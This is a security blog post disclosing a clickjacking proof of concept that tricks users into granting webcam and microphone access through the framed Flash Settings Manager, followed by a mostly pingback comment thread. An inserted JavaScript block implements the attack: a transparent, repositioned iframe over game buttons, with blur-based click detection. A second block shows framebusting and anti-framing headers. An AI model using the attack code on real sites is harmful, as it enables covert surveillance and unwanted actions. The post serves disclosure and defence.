Malicious camera spying using ClickJacking

Posted by guya

Update: Adobe has fixed this issue by framebusting the Settings Manager pages. Now 99.9% of users are protected from this specific exploit. Congrats on the fast response.

Turn every browser into a surveillance zombie: the wet dream of every private eye and peeping tom. Imagine this scenario: you play a short game on the web and, by doing so, you unknowingly grant someone full access to your webcam and microphone.

I’ve put a live demo of it here; the demo does not listen to or record any of your input.

If you don’t want to try it, or don’t have a webcam connected, watch the video instead.

Video: www.youtube.com/v/gxyLbpldmuU

When I first heard about ClickJacking and how concerned Adobe was about it, I assumed the Flash Player Security Dialog must have been compromised. But the Security Dialog does a good job of disabling itself when you try to mess with its visibility through DHTML. Unless there is some 0-day issue with the Dialog, it is probably relatively safe.

The problem is the Flash Player Settings Manager instead. Unlike the in-player Security Dialog, the Settings Manager is served as an ordinary web page, so it can be loaded in an iframe like any other page. This inheritance from Macromedia may be the Achilles’ heel of Flash Player security.

I’ve written a quick and dirty JavaScript game that exploits exactly that, and it demonstrates how an attacker can get hold of the user’s camera and microphone. That access could be used, for example, with a platform like ustream, justin and the like, or to stream to a private server and build a malicious surveillance platform.

I built it as a JS game to make it easier to follow, but bear in mind that any Flash, Java, Silverlight or DHTML game or application can be used to achieve the same thing.

Some of the clicks are real game clicks; others are jacked clicks. Whenever a click needs to be jacked, the game content simply moves behind the iframe holding the Settings Manager using z-index, so the click the user aims at the game is delivered to the Settings Manager control underneath instead.
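The z-index swap described above, as an added example that is not the original demo’s code. It models the game-plus-iframe stacking in plain JavaScript: a step script says which clicks are real and which are jacked, the pure `layoutForStep` function computes where the iframe must sit and which layer is on top, and a small browser-only part applies that to the page. The framed URL, element ids and control coordinates are hypothetical placeholders; the real Settings Manager layout is not reproduced, and advancing the game on `window` blur during a jacked step is one common way to detect that the click went into the frame, not something the post states.

```javascript
// Added example, not the original demo's code. It models the mechanism the post
// describes: a page hosts a game and an iframe of the target page; for clicks
// that are to be jacked, the game content drops behind the iframe via z-index,
// so the click the user aims at the game is delivered to the framed control.
// FRAMED_URL, the element ids and the control coordinates are hypothetical.

const FRAMED_URL = "https://target.example/settings.html"; // placeholder, not a real page

// Where the sensitive controls sit inside the framed page (hypothetical
// page-relative pixel offsets; an attacker measures these in advance).
const FRAMED_CONTROLS = {
  allowRadio: { x: 212, y: 148 },
  closeButton: { x: 340, y: 290 },
};

// The game script: some clicks are real, some are jacked onto a framed control.
const SCRIPT = [
  { jacked: false },
  { jacked: true, control: "allowRadio" },
  { jacked: false },
  { jacked: true, control: "closeButton" },
];

// CSS state for one step. The game's button is at (buttonX, buttonY) on the
// attacker's page. For a jacked step the iframe is offset so the framed
// control lies exactly under that button, stacked above the game and fully
// transparent: the user still sees the game, the browser delivers the click
// to the frame.
function layoutForStep(step, buttonX, buttonY) {
  if (!step.jacked) {
    return { frameZ: 0, gameZ: 1, frameOpacity: 0, frameLeft: 0, frameTop: 0, clickLandsOn: "game" };
  }
  const c = FRAMED_CONTROLS[step.control];
  return {
    frameZ: 1,
    gameZ: 0,
    frameOpacity: 0,
    frameLeft: buttonX - c.x,
    frameTop: buttonY - c.y,
    clickLandsOn: "frame",
  };
}

// Walk the script and report which clicks get jacked, and onto what.
function jackedClicks(script, buttonX, buttonY) {
  return script
    .map((s, i) => ({ step: i, control: s.control, ...layoutForStep(s, buttonX, buttonY) }))
    .filter((r) => r.clickLandsOn === "frame");
}

// Browser-only: apply a layout to the real elements. Returns false under Node.
function applyLayout(layout) {
  if (typeof document === "undefined") return false;
  const frame = document.getElementById("target-frame");
  const game = document.getElementById("game");
  frame.style.position = "absolute";
  frame.style.left = layout.frameLeft + "px";
  frame.style.top = layout.frameTop + "px";
  frame.style.opacity = String(layout.frameOpacity);
  frame.style.zIndex = String(layout.frameZ);
  game.style.position = "relative";
  game.style.zIndex = String(layout.gameZ);
  return true;
}

// Markup the hosting page would carry (kept as a string so this file also runs under Node).
const PAGE_MARKUP = `
<div id="game"><button id="hit" style="position:absolute;left:300px;top:200px">Hit!</button></div>
<iframe id="target-frame" src="${FRAMED_URL}" scrolling="no" frameborder="0"></iframe>
`;

// Browser-only wiring. A real click on the game button advances the script.
// During a jacked step the button never receives the click (the frame does),
// so the page advances on window blur, which fires when focus moves into the iframe.
if (typeof document !== "undefined") {
  let step = 0;
  const advance = () => { step = (step + 1) % SCRIPT.length; applyLayout(layoutForStep(SCRIPT[step], 300, 200)); };
  document.getElementById("hit").addEventListener("click", advance);
  window.addEventListener("blur", () => { if (SCRIPT[step].jacked) advance(); });
  applyLayout(layoutForStep(SCRIPT[0], 300, 200));
}
```

The point to take from `layoutForStep` is that nothing in the framed page changes; only the stacking order and offset on the attacker’s page do, which is why the framed page cannot detect the attack from its own DOM and has to refuse being framed in the first place.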

I had doubts about publishing this, but if I could figure it out, so can the bad guys, so it is better that people know about it.

In this case Adobe could simply framebust the pages that host the Settings Manager (and, per the update above, that is what it did). Framebusting has two drawbacks here: it does not cover every case (legacy browsers, for example), and it forces Adobe to rely on JavaScript running inside the framed page, which the framing page may be able to block. It also protects only the documents that actually carry the script. Today the declarative answer is a response header (X-Frame-Options, or the Content-Security-Policy frame-ancestors directive) that the browser enforces before any page script runs; neither existed when this was written.
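Framebusting beside the header-based defence that later replaced it, as an added example that is not code from the post or from Adobe. `framebust` is the classic script the post refers to, `antiFramingHeaders` returns the two response headers a framed page sends instead, and `xfoAllows` and `frameAncestorsAllows` are a deliberately small model of how a browser evaluates those headers (no port handling, no scheme upgrades for `'self'`). All origins and the allow-list are hypothetical.

```javascript
// Added example, not code from the post or from Adobe. The post points out
// that framebusting misses legacy browsers and depends on JavaScript. The
// defence that later became standard is declarative: a response header the
// browser enforces before any script in the framed page runs. Below: the
// classic framebuster, the headers a framed page should send instead, and a
// deliberately small model of how a browser evaluates those headers.
// All origins are hypothetical; ports and 'self' scheme upgrades are ignored.

// 1. Classic framebuster, run by the framed page. Weak: inert when script is
//    disabled or blocked (e.g. the page is framed with the HTML5 sandbox
//    attribute), and older browsers let the framing page intercept the
//    navigation it triggers. Browser-only; returns false under Node.
function framebust() {
  if (typeof window === "undefined") return false;
  if (window.top !== window.self) {
    window.top.location = window.self.location;
    return true;
  }
  return false;
}

// 2. Header-based policy. Both headers are sent so that browsers that know
//    only X-Frame-Options still enforce something; CSP wins where supported.
function antiFramingHeaders(allowedAncestors = []) {
  if (allowedAncestors.length === 0) {
    return {
      "X-Frame-Options": "DENY",
      "Content-Security-Policy": "frame-ancestors 'none'",
    };
  }
  // X-Frame-Options cannot express an arbitrary allow-list, so it falls back
  // to SAMEORIGIN while CSP carries the real list.
  return {
    "X-Frame-Options": "SAMEORIGIN",
    "Content-Security-Policy": "frame-ancestors 'self' " + allowedAncestors.join(" "),
  };
}

// How a browser applies X-Frame-Options to a framed document of origin
// pageOrigin embedded by a top-level document of origin topOrigin.
function xfoAllows(value, pageOrigin, topOrigin) {
  const v = String(value || "").trim().toUpperCase();
  if (v === "DENY") return false;
  if (v === "SAMEORIGIN") return pageOrigin === topOrigin;
  return true; // absent or unrecognised value: the header protects nothing
}

// How a browser matches one ancestor origin against a frame-ancestors
// directive: 'none', 'self', exact origins, and a leading "*." host wildcard.
function frameAncestorsAllows(directive, pageOrigin, ancestorOrigin) {
  const sources = directive.replace(/^frame-ancestors\s+/i, "").trim().split(/\s+/);
  if (sources.includes("'none'")) return false;
  const anc = new URL(ancestorOrigin);
  for (const src of sources) {
    if (src === "'self'") {
      if (ancestorOrigin === pageOrigin) return true;
      continue;
    }
    if (src.startsWith("'")) continue; // other keywords are not valid here
    const hostPart = src.replace(/^[a-z][a-z0-9+.-]*:\/\//i, "");
    const scheme = src.includes("://") ? src.split("://")[0] + ":" : anc.protocol;
    if (hostPart.startsWith("*.")) {
      const suffix = hostPart.slice(1); // e.g. ".partner.example"
      if (anc.protocol === scheme && anc.hostname.endsWith(suffix)) return true;
      continue;
    }
    if (anc.protocol === scheme && anc.hostname === hostPart) return true;
  }
  return false;
}

// Convenience: does a given framing attempt get through the policy in (2)?
function framingAllowed(allowedAncestors, pageOrigin, ancestorOrigin) {
  const h = antiFramingHeaders(allowedAncestors);
  return frameAncestorsAllows(h["Content-Security-Policy"], pageOrigin, ancestorOrigin);
}
```

The contrast to notice: `framebust` only does anything if the framed page’s own script gets to run, whereas the headers from `antiFramingHeaders` are evaluated by the browser when the response arrives, so an attacker’s page gets no say in the decision.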

Play the demo here; watch the video here.

This entry was posted in ClickJacking, Flash Security, Games, Javascript, Safeloper, Security, Silverlight by guya.

100 thoughts on “Malicious camera spying using ClickJacking”

  1. x-tense said:

    nice PoC

  2. Josh Tynjala said:

    Impressive. Thanks for sharing.

  3. Pingback: Zero Day mobile edition

  4. Pingback: Details of Clickjacking Attack Revealed With Online Spying Demo - Desktop Security News Analysis - Dark Reading

  5. Pingback: hackademix.net » Hello ClearClick, Goodbye Clickjacking!

  6. Pingback: Monyer’s Training Notes » Blog Archive » Clickjacking Details

  7. Pingback: Clickjacking Details | [blog name garbled]

  8. Pingback: Hello ClearClick, Goodbye Clickjacking! | [blog name garbled]

  9. Pingback: Clickjacking here’s how it works | Ugh!!'s Greymatter Honeypot

  10. Pingback: Clickjacking Details | [blog name garbled]

  11. Pingback: Hello ClearClick, Goodbye Clickjacking! | [blog name garbled]

  12. Pingback: Clickjacking vulnerability revealed - Foros de CHW

  13. Pingback: Clickjacking Attack Revealed

  14. Pingback: Hit the button, Jack! « partikelfernsteuerung

  15. Pingback: The WHATWG Blog » Blog Archive » This Week in HTML 5 - Episode 8

  16. Pingback: Midnight Research Labs - Clickjacking details released

  17. w0lf said:

    This seems like a real wet dream for spyware. Hope all the browsers soon find a way to fix the way they handle iframes.

  18. Pingback: Clickjacking for spying? | Maestro Security Blogs

  19. Pingback: Clickjacking: One click to cam spy | The Blog Pirate

  20. Pingback: ClickJacking | Aplikacje internetowe

  21. yehg.net said:

    Plugins are always vulnerable. Many 0days still out there.

  22. Pingback: Video: using Clickjacking to spy on unsuspecting users | Blog.makernet.it

  23. Pingback: Click jacking - Xtreme CPU

  24. Pingback: "Clickjacking" Details Emerge | Student Tech News

  25. Elisabeth said:

    This is Dong-bin (Elisabeth) Kim, and I’m a reporter for Information Security 21C, a monthly magazine, and Boan News, an internet daily news site.
    I’m very impressed, so I’d like to introduce your PoC in our magazine.
    So, if you’re OK with it, I’d like to capture your PoC and put it into our magazine.
    Please send a comment to me.

  26. Pingback: Firefox Extension Blocks Clickjacking! | TekBlog

  27. Pingback: Liquidmatrix Security Digest » Security Briefing: October 8th (Late Edition)

  28. Pingback: Clickjacking, a dangerous vulnerability in modern browsers | AtajoTV

  29. Pingback: Clickjacking Attack Lets Web Sites See, Hear You |

  30. Pingback: Clickjacking: a security flaw affecting Adobe Flash Player

  31. Pingback: “Clickjacking” Details Emerge | Syber News

  32. Kilgore said:

    Really nice PoC!

  33. sheez said:

    Blah, this was demonstrated by a DOD security expert YEARS ago. Man, get with the times.

  34. Pingback: [title garbled] Clickjacking | Raz0r.name

  35. Pingback: TechOnlineNews.com » Adobe plugs Flash Player hole

  36. Pingback: La France d’en bas » Blog Archive » ClickJacking uses Flash to film you without your knowledge

  37. Pingback: ClickJacking Exploit : FraudO.com

  38. Pingback: Apukeittiö.fi » Blog Archive » ClickJacking or UI Redressing

  39. Pingback: ew-bloggt » Researchers reveal details of clickjacking attacks

  40. Pingback: [title garbled] - GENMICHA

  41. Pingback: NoScript - Add-on to prevent ClickJacking

  42. Pingback: Ajaxian » This Week in HTML 5: Web Forms 2, Search, and more

  43. Pingback: Security Ninja Blog | Clickjacking

  44. Pingback: Hello ClearClick, Goodbye Clickjacking! | [blog name garbled]

  45. Kugelfisch said:

    In fact, Macromedia’s framekiller does not seem to help at all, as the Settings Manager’s Flash movie itself can still be loaded into an iframe. Have a quick look at this derivative of your PoC: kugelfisch.bplaced.net/game.html

  46. Pingback: Adobe’s Workaround for “Clickjacking” Issue, and What You Can Do Now

  47. Pingback: Adobe fixes ‘clickjacking’ flaw | TechHairBall.com

  48. Pingback: Telecom, Security & P2P » [Chinese] clickjacking

  49. Pingback: Clickjacking: Potentially harmful web browser exploit | Network Administrator | TechRepublic.com

  50. Eugene said:

    Looking forward to more information about this. Thanks for sharing. Eugene

  51. Pingback: Clickjacking and how it affects institutions « robert dice…

  52. Pingback: Flash Security: Clickjacking the Webcam : TroyWorks

  53. Pingback: Clickjacking Details | Small Business System

  54. Pingback: Application Security Talk » Clickjacking: Do you see what I see?

  55. John aniime said:

    Click jacking has long since been used as a term by search engine marketers… you need a new term.

    What click jacking really is, is swapping your own ads into someone else’s page, often by overlaying, using JavaScript, or filtering their content.

  56. Pingback: Preventing Clickjacking with Framebusting - KeepItLocked.net

  57. Pingback: My talk at WebExpo Praha 2008

  58. Pingback: Packets of Consciousness » Clearjacking: So How Fun is This, Now?

  59. Decapper said:

    Yeah, I would hate for this to happen - www.pricelessweddings.com.au - as I would be caught with my pants down.

  60. Pingback: Marco’s Webdev Notepad » Blog Archive » Clickjacking

  61. Pingback: Brown Tips » Blog Archive » What IS ClickJacking

  62. Pingback: Prominent Security » Twitter, and the Popularity of Clickjacking.

  63. travesti said:

    ction, please visit the blog post of Flash developer Guy Aharonovsky, where he demonstrates in a video how a user unintentionally changes his browser’s security settings while playing a JavaScript

  64. Pingback: Flash + Internet = Big Brother is watching you

  65. Pingback: Dipl.-Inform. Carsten Eilers

  66. Pingback: Dipl.-Inform. Carsten Eilers

  67. Pingback: John Smith’s younger brother, Adam | GUYA.NET

  68. y8 juegos said:

    What click jacking really is, is swapping your own ads into someone else’s page, often by overlaying, using JavaScript, or filtering their content?

  69. Pingback: Preventing Clickjacking with Framebusting | Keep It Locked

  70. Enoch Boris said:

    Hiya! I just would like to give an enormous thumbs up for the nice data you have here on this post. I will be coming back to your weblog for more soon.